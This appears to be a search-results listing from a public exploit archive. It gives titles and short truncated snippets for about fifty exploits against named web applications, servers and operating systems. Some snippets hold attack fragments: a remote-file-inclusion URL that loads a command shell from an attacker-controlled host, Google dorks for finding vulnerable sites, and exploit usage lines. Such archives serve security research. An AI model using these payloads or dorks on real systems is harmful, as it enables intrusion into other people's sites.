41207 matches found
ID Automation Linear Barcode - ActiveX Denial of Service
ID Automation Linear Barcode - ActiveX Denial of Service 2007/05/13 -------------------------------------------------------------------------------------------------- ID Automation Linear Barcode ActiveX Control IDAutomationLinear6.dll v. 1.6.0.5 DoS url: http://www.idautomation.com/ price: from...
Weatimages 1.7.1 - ini[langpack] Remote File Inclusion
Weatimages 1.7.1 - inilangpack Remote File Inclusion RFI Weatimages Hack Script name : Weatimages Script Download Adress:http://www.hotscripts.com/jump.php?listingid=52592&jumptype=1 Demo site:http://www.nazarkin.name/projects/weatimages/demo/index.php?inilangpack=shelladress Google Dork : inurl:...
MangoBery CMS 0.5.5 - quotes.php Remote File Inclusion
MangoBery CMS 0.5.5 - quotes.php Remote File Inclusion Mangobery-0.5.5 Found by kezzap66345 Script Page:http://mangobery.sourceforge.net/ Demo Site:http://mangobery.beryllium.ca/ Script Download:http://sourceforge.net/project/showfiles.php?groupid=63834&packageid=60858...
Coppermine Photo Gallery 1.4.9 - SQL Injection
Coppermine Photo Gallery 1.4.9 - SQL Injection !/usr/bin/php ?php / Coppermine Photo Gallery 1.4.9 Remote SQL Injection Vulnerability Note: Requires a valid user account. Usage: php script.php host path table prefix user id username password Usage Example: php script.php domain.com /coppermine/...
Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation (2)
Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation 2 source: https://www.securityfocus.com/bid/20471/info The Netscape Portable Runtime API running on Sun Solaris 10 operating system is prone to a local privilege-escalation vulnerability. A successful exploit of this iss...
n@board 3.1.9e - naboard_pnr.php Remote File Inclusion
n@board 3.1.9e - naboardpnr.php Remote File Inclusion n@board v3.1.9e, 3.1.8cgb ,3.1.8tc skin Remote File Include Vulnerability Turkish Hacker's Discovered By : mdx and TheBatHacker ------------------------------------------------------ Cyber-Warrior TIM Ay ve Y.ld.zlar Geceye Yak...r... the moon...
phpBB Shadow Premod 2.7.1 - Remote File Inclusion
phpBB Shadow Premod 2.7.1 - Remote File Inclusion --------------------------------------------------------------------------- Shadow Prémod = 2.7.1 phpbbrootpath Remote File Include Vulnerability --------------------------------------------------------------------------- Discovered By Kw3RLn...
Streamripper 1.61.25 - HTTP Header Parsing Buffer Overflow (1)
Streamripper 1.61.25 - HTTP Header Parsing Buffer Overflow 1 / . \ \ \ \ | | / | | | | \ / / /\ \ / \ | \ / / / / 29\08\06 / || / / mm. dM8 YMMMb. dMM8 YMMMMb dMMM' YMMMb dMMMP There are doors I have yet to open YMMM MMM' windows I have yet to look through "MbdMP Going forward may not be...
Integramod Portal 2.x - functions_portal.php Remote File Inclusion
Integramod Portal 2.x - functionsportal.php Remote File Inclusion !/usr/bin/perl Method found and exploit scripted by nukedx Contacts ICQ: 10072 Web: http://www.nukedx.com MAIL/MSN: [email protected] Original advisory can be found at: http://www.nukedx.com/?viewdoc=47 Integramod Portal Copyright...
Mambo Component User Home Pages 0.5 - Remote File Inclusion
Mambo Component User Home Pages 0.5 - Remote File Inclusion Kurdish Security Freedom For Ocalan Contact : irc.gigachat.net kurdhack & www.PatrioticHackers.com Rish : High Class : Remote Script : User Home Pges Site : www.ravensportal.co.uk Thanx :...
PixelPost 1-5rc1-2 - Privilege Escalation
PixelPost 1-5rc1-2 - Privilege Escalation !/usr/bin/php -q -d shortopentag=on ? echo "Pixelpost = 1-5rc1-2 privilege escalation exploit\r\n"; echo "by rgod [email protected]\r\n"; echo "site: http://retrogod.altervista.org\r\n"; echo "dork: pixelpost "RSS 2.0" "ATOM feed" "Valid xHTML / Valid...
EQdkp 1.3.0 - dbal.php Remote File Inclusion
EQdkp 1.3.0 - dbal.php Remote File Inclusion Title: EQdkp = 1.3.0 Remote File Inclusion URL: http://www.eqdkp.com/ Dork: "powered by EQdkp" Author: OLiBekaS greetz: Skulmatic, weleh, brockencode, and all papmahackerlink crew Exploit: /includes/dbal.php?eqdkprootpath=http://yourhost/cmd.gif?cmd=ls...
PHPX 3.5.x - Admin login.php SQL Injection
PHPX 3.5.x - Admin login.php SQL Injection source: https://www.securityfocus.com/bid/15680/info PHPX is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. Successful exploitation coul...
Noahs Classifieds 1.3 - index.php Cross-Site Scripting
Noahs Classifieds 1.3 - index.php Cross-Site Scripting source: https://www.securityfocus.com/bid/14835/info Noah's Classifieds is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage thi...
PHPHeaven PHPMyChat 0.14.5 - Style.CSS.php3 Cross-Site Scripting
PHPHeaven PHPMyChat 0.14.5 - Style.CSS.php3 Cross-Site Scripting source: https://www.securityfocus.com/bid/13628/info phpMyChat is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary scri...
CA License Server - GETCONFIG Remote Buffer Overflow
CA License Server - GETCONFIG Remote Buffer Overflow / Computer-Associates, License Service Stack Overflow Homepage: ca.com Affected version: v1.61 and below in eTrust, Unicenter, BrightStor, etc.. Patched version: hotfix Link: ca.com Date: 04 March 2005 Application Risk: Tsunami Internet Risk:...
Dropbear SSH 0.34 - Remote Code Execution
Dropbear SSH 0.34 - Remote Code Execution / Linux x86 Dropbear SSH quit Connection closed. % objdump -R /usr/local/sbin/dropbear| grep malloc 080673bc R386JUMPSLOT malloc % drop-root -v24 localhost ?.2022u%24$hn@localhost's password: Connection closed by 127.0.0.1 % telnet localhost 10275 Trying...
U.S. Robotics USR808054 Wireless Access Point - Web Administration Denial of Service
U.S. Robotics USR808054 Wireless Access Point - Web Administration Denial of Service source: https://www.securityfocus.com/bid/10840/info The USR808054 wireless access point is reported to contain a denial of service vulnerability in its embedded web server. When malicious requests are received b...
Linux Kernel 2.2.252.4.242.6.2 - mremap() Local Privilege Escalation
Linux Kernel 2.2.252.4.242.6.2 - mremap Local Privilege Escalation / mremap missing domunmap return check kernel exploit gcc -O3 -static -fomit-frame-pointer mremappte.c -o mremappte ./mremappte suid shell Vulnerable kernel versions are all include include include include include include include...
Microsoft WordPerfect Document Converter (Windows NT4 Workstation SP5SP6 French) - File Template Buffer Overflow (MS03-036)
Microsoft WordPerfect Document Converter Windows NT4 Workstation SP5SP6 French - File Template Buffer Overflow MS03-036 // / Microsoft WordPerfect Document Converter Buffer Overflow Exploit MS03-036 / / / / Exploit with several targets / / / / Find your own return address with : / / findhex dllna...
Trend Micro ScanMail For Exchange 3.8 - Authentication Bypass
Trend Micro ScanMail For Exchange 3.8 - Authentication Bypass source: https://www.securityfocus.com/bid/6619/info A vulnerability has been reported for ScanMail for Microsoft Exchange. The vulnerability allows a remote attacker to bypass existing authentication mechanisms and obtain access to...
Zone Labs ZoneAlarm 3.03.1 - Syn Flood Denial of Service
Zone Labs ZoneAlarm 3.03.1 - Syn Flood Denial of Service // source: https://www.securityfocus.com/bid/5975/info ZoneAlarm is a firewall software package designed for Microsoft Windows operating systems. It is distributed and maintained by Zone Labs. ZoneAlarm does not properly handle some types o...
Microsoft Windows XP2000NT 4.0 - Window Message Subsystem Design Error (4)
Microsoft Windows XP2000NT 4.0 - Window Message Subsystem Design Error 4 // source: https://www.securityfocus.com/bid/5408/info A serious design error in the Win32 API has been reported. The issue is related to the inter-window message passing system. This vulnerability is wide-ranging and likely...
SuSE Linux 6.47.07.17.2 Berkeley Parallel Make - Local Buffer Overflow
SuSE Linux 6.47.07.17.2 Berkeley Parallel Make - Local Buffer Overflow // source: https://www.securityfocus.com/bid/3573/info Parallel Make pmake is a freely available version of the make program, originally distributed with Berkeley Unix. It is designed to execute Makefiles and build programs...
Cisco Catalyst 4000 4.x5.x Catalyst 5000 4.55.x Catalyst 6000 5.x - Memory Leak Denial of Service
Cisco Catalyst 4000 4.x5.x Catalyst 5000 4.55.x Catalyst 6000 5.x - Memory Leak Denial of Service source: https://www.securityfocus.com/bid/2072/info Cisco Catalyst is a high speed switch implemented in local area networks. The telnet server that is built into the Catalyst firmware for remote...
Internet Security Systems ICECap Manager 2.0.23 - Default Username and Password
Internet Security Systems ICECap Manager 2.0.23 - Default Username and Password source: https://www.securityfocus.com/bid/1216/info ICECap Manager is a management console for BlackICE IDS Agents and Sentries. By default, ICECap Manager listens on port 8081, transmits alert messages to another...
Phorum 3.0.7 - auth.php3 Backdoor Access
Phorum 3.0.7 - auth.php3 Backdoor Access source: https://www.securityfocus.com/bid/2274/info Phorum is a freely available, open source, popular WWW Board written by Brian Moon. It is designed to enhance the services offered on a web page, allow users to interact with one another through bulletin...
Majordomo 1.94.41.94.5 - Local -C Parameter (2)
Majordomo 1.94.41.94.5 - Local -C Parameter 2 // source: https://www.securityfocus.com/bid/903/info It is possible for a local user to gain majordomo privileges through a vulnerability which allows privileged arbitrary commands to be executed. If the -C parameter is passed to majordomo or one of...
Network Associates Gauntlet Firewall 5.0 - Denial of Service
Network Associates Gauntlet Firewall 5.0 - Denial of Service // source: https://www.securityfocus.com/bid/556/info There is a vulnerability in Gauntlet Firewall 5.0 which allows an attacker to remotely cause a denial of service. The vulnerability occurs because Gauntlet Firewall cannot handle a...
HP-UX 10.20 newgrp - Local Privilege Escalation
HP-UX 10.20 newgrp - Local Privilege Escalation source: https://www.securityfocus.com/bid/683/info Due to insufficient bounds checking on user supplied arguments, it is possible to overflow an internal buffer and execute arbitrary code as root. !/usr/bin/perl use FileHandle; sub h2cs local$stuff=...
ATutor 2.2.4 - id SQL Injection
ATutor 2.2.4 - id SQL Injection Exploit Title: ATutor 2.2.4 - 'id' SQL Injection Date: 2020-02-23 Exploit Author: Andrey Stoykov Vendor Homepage: https://atutor.github.io/ Software Link: https://sourceforge.net/projects/atutor/files/latest/download Version: ATutor 2.2.4 Tested on: LAMP on Ubuntu...
Online Job Portal 1.0 - user_email SQL Injection
Online Job Portal 1.0 - useremail SQL Injection Exploit Title: Online Job Portal 1.0 - 'useremail' SQL Injection Dork: N/A Date: 2020-02-06 Exploit Author: Ihsan Sencan Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html Software Link:...
piSignage 2.6.4 - Directory Traversal
piSignage 2.6.4 - Directory Traversal Exploit Title: piSignage 2.6.4 - Directory Traversal Date: 2019-11-13 Exploit Author: JunYeong Ko Vendor Homepage: https://pisignage.com/ Version: piSignage before 2.6.4 Tested on: piSignage before 2.6.4 CVE : CVE-2019-20354 Summary: The web application...
Small CRM 2.0 - Authentication Bypass
Small CRM 2.0 - Authentication Bypass Exploit Title: Small CRM 2.0 - Authentication Bypass Google Dork: N/A Date: 2020-01-02 Exploit Author: FULLSHADE Vendor Homepage: https://phpgurukul.com/ Software Link: https://phpgurukul.com/small-crm-php/ Version: V2.0 Tested on: Windows CVE : N/A...
Bullwark Momentum Series JAWS 1.0 - Directory Traversal
Bullwark Momentum Series JAWS 1.0 - Directory Traversal Title: Bullwark Momentum Series JAWS 1.0 - Directory Traversal Date: 2019-12-11 Author: Numan Türle Vendor Homepage: http://www.bullwark.net/ Version : Bullwark Momentum Series Web Server JAWS/1.0 Software Link :...
Yachtcontrol Webapplication 1.0 - Unauthenticated Remote Code Execution
Yachtcontrol Webapplication 1.0 - Unauthenticated Remote Code Execution Exploit Title: Yachtcontrol Webapplication 1.0 - Unauthenticated Remote Code Execution Google Dork: N/A Date: 2019-12-06 Exploit Author: Hodorsec Vendor Homepage: http://www.yachtcontrol.nl/en/ Version: 1.0 Software Link:...
Oracle Siebel Sales 8.1 - Persistent Cross-Site Scripting
Oracle Siebel Sales 8.1 - Persistent Cross-Site Scripting Exploit Title : Oracle Siebel Sales 8.1 - Persistent Cross-Site Scripting Exploit Author : omurugur Software link: https://www.oracle.com/tr/applications/siebel/ Effective version : Oracle Siebel Sales 8.1 CVE: N/A Examples Request; POST...
logrotten 3.15.1 - Privilege Escalation
logrotten 3.15.1 - Privilege Escalation Exploit Title: logrotten 3.15.1 - Privilege Escalation Date: 2019-10-04 Exploit Author: Wolfgang Hotwagner Vendor Homepage: https://github.com/logrotate/logrotate Software Link: https://github.com/logrotate/logrotate/releases/tag/3.15.1 Version: all version...
GoAhead 2.5.0 - Host Header Injection
GoAhead 2.5.0 - Host Header Injection Exploit Title: GoAhead Web server HTTP Header Injection. Shodan Query: Server: Goahead Discovered Date: 05/07/2019 Exploit Author: Ramikan Vendor Homepage: https://www.embedthis.com/goahead/ Affected Version: 2.5.0 may be others. Tested On Version: 2.5.0 in...
Tableau - XML External Entity
Tableau - XML External Entity Exploit Title: Tableau XXE Google Dork: N/A Date: Reported to vendor July 2019, fix released August 2019. Exploit Author: Jarad Kopf Vendor Homepage: https://www.tableau.com/ Software Link: Tableau Desktop downloads: https://www.tableau.com/products/desktop/download...
Sar2HTML 3.2.1 - Remote Command Execution
Sar2HTML 3.2.1 - Remote Command Execution Exploit Title: sar2html Remote Code Execution Date: 01/08/2019 Exploit Author: Furkan KAYAPINAR Vendor Homepage:https://github.com/cemtan/sar2html Software Link: https://sourceforge.net/projects/sar2html/ Version: 3.2.1 Tested on: Centos 7 In web...
macOS iOS JavaScriptCore - JSValue Use-After-Free in ValueProfiles
macOS iOS JavaScriptCore - JSValue Use-After-Free in ValueProfiles While fuzzing JSC, I encountered the following JS program which crashes JSC from current HEAD and release /System/Library/Frameworks/JavaScriptCore.framework/Resources/jsc: // Run with --useConcurrentJIT=false...
Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload Remote Code Execution
Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload Remote Code Execution Exploit Title: Authenticated insecure file upload and code execution flaw in Ahsay Backup v7.x - v8.1.1.50. POC Date: 26-6-2019 Exploit Author: Wietse Boonstra Vendor Homepage: https://ahsay.com Software Link:...
Microsoft DirectWrite AFDKO - Stack Corruption in OpenType Font Handling Due to Negative cubeStackDepth
Microsoft DirectWrite AFDKO - Stack Corruption in OpenType Font Handling Due to Negative cubeStackDepth -----===== Background =====----- AFDKO Adobe Font Development Kit for OpenType is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling...
Mozilla Spidermonkey - Unboxed Objects Uninitialized Memory Access
Mozilla Spidermonkey - Unboxed Objects Uninitialized Memory Access / For constructors, Spidermonkey implements a "definite property analysis" 1 to compute which properties will definitely exist on the constructed objects. Spidermonkey then directly allocates the constructed objects with the final...
WordPress Plugin iLive 1.0.4 - Cross-Site Scripting
WordPress Plugin iLive 1.0.4 - Cross-Site Scripting Exploit Title: iLive - Intelligent WordPress Live Chat Support Plugin v1.0.4 Stored XSS Injection Google Dork: - Date: 2019/06/25 Exploit Author: m0ze Vendor Homepage: http://www.ilive.wpapplab.com/ Software Link:...
Qualcomm Android - Kernel Use-After-Free via Incorrect set_page_dirty() in KGSL
Qualcomm Android - Kernel Use-After-Free via Incorrect setpagedirty in KGSL The following issue exists in the android-msm-wahoo-4.4-pie branch of https://android.googlesource.com/kernel/msm and possibly others: When kgslmementrydestroy in drivers/gpu/msm/kgsl.c is called for a writable entry with...
Microsoft Windows (x84x64) - Error Reporting Discretionary Access Control List Local Privilege Escalation
Microsoft Windows x84x64 - Error Reporting Discretionary Access Control List Local Privilege Escalation EDIT: Apparently this was patched earlier this month.. so whatever. Windows Error Reporting Arbitrary DACL write It can take upwards of 15 minutes for the bug to trigger. If it takes too long,...
ManageEngine Applications Manager 11.0 14.0 - SQL Injection Remote Code Execution (Metasploit)
ManageEngine Applications Manager 11.0 14.0 - SQL Injection Remote Code Execution Metasploit This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "ManageEngine Applications Manager 11.0 %q This module...
Airbnb Clone Script - Multiple SQL Injection
Airbnb Clone Script - Multiple SQL Injection Exploit Title: Homey BNB Airbnb Clone Script - Multiple SQL Injection Date: 27.03.2019 Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.doditsolutions.com/airbnb-clone-script/ Demo Site: http://sitedemos.in/homeybnb/ Version: V4 Tested on...